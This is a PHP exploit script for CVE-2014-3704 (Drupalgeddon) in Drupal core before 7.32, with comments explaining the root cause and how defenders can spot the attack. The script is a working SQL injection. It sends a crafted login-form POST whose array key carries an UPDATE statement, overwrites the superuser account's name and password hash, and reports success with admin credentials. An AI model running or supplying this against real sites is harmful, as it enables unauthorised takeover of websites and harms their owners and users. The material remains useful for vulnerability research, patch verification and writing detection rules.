drupalexploit_2014_3704.php
<?php
# Exploit for CVE-2014-3704
# Based on script from Dustin Dörr
# Koen Van Impe - 20141021
#
# https://www.drupal.org/SA-CORE-2014-005
#
# Vulnerable: Drupal core versions before 7.32; upgrading to 7.32 or later is the fix
#
#
# run as php drupalexploit_2014_3704.php
#
# Note :
# - the script can report failure even though the injection
# worked: its check depends on the Drupal theme printing
# the full status/error messages in the returned page
# (print render($messages) )
#
# - if you want to use your custom supplied user password
# instead of "admin" in the script below then
# you can use the Drupal function user_hash_password
# after including "/includes/password.inc" from the
# Drupal root
# Flat script: builds one form-encoded POST for the Drupal login block, sends it,
# and guesses from the returned HTML whether the injected statement ran.
# The request is a state-changing write (it overwrites an account row), not a
# read-only vulnerability check.

# Base URL of the Drupal site under test (placeholder value).
$url = 'http://DRUPALSITE';
# Account name and password hash that the injected statement writes into the
# users table. The hash is URL-encoded because it is pasted straight into the
# form-encoded request body below.
# NOTE(review): the success message further down implies this hash corresponds
# to the password "admin" - that cannot be confirmed from this file.
$username = "admin";
$password = urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g');
# Row to overwrite; uid 1 is the account created at install time, which Drupal
# treats as the site superuser.
$uid = 1;
# URL-encoded UPDATE on {users} ({users} is Drupal's table-prefix placeholder)
# that sets name and pass for the chosen uid.
$sql = "update+{users}+set+name%3D'$username'+,+pass+%3d+'$password'+where+uid+%3D+'$uid'";
# Login-block form submission in which "name" is sent as an array and one of the
# array KEYS carries the SQL statement. This is the CVE-2014-3704 root cause:
# vulnerable Drupal 7 releases build query placeholders from the keys of
# array-valued arguments without validating them.
# Detection: a POST with form_id=user_login_block whose name[...] key is
# anything other than a plain integer index (here it contains spaces,
# semicolons and SQL keywords). Access logs normally omit POST bodies, so this
# is only visible with request-body logging or a WAF/IDS rule.
$post_data = "name[0%20;$sql;;#%20%20]=vanimpe&name[0]=vanimpe&pass=vanimpe&test2=vanimpe&form_build_id=&form_id=user_login_block&op=Log+in";
# Stream-context options: send the body above as a form-encoded HTTP POST.
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
# Sends the request. file_get_contents() returns false on failure; no timeout or
# HTTP status check is performed here.
$data = file_get_contents($url . '?q=node&destination=node', null, stream_context_create( $params ));
# Success heuristic: the response body contains a PHP warning about mb_strlen()
# receiving a non-string (presumably raised when the array-shaped "name" reaches
# the login validation - confirm against the Drupal source). The trailing
# "&& $data" only guards against an empty/false response.
# The same warning in a site's PHP error log or Drupal log, next to login POSTs,
# is a useful indicator for defenders. A site that hides PHP warnings from the
# rendered page will be reported as "Error" by this check regardless of outcome.
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
# The message text is static: it is printed without actually attempting a login
# and does not reflect a changed $username.
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
}
else {
# Reached for any non-matching response, including network failure, a patched
# site, or a vulnerable site whose theme does not print messages.
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
# Debug aid, left disabled: dump the raw response body.
//print_r($data);
?>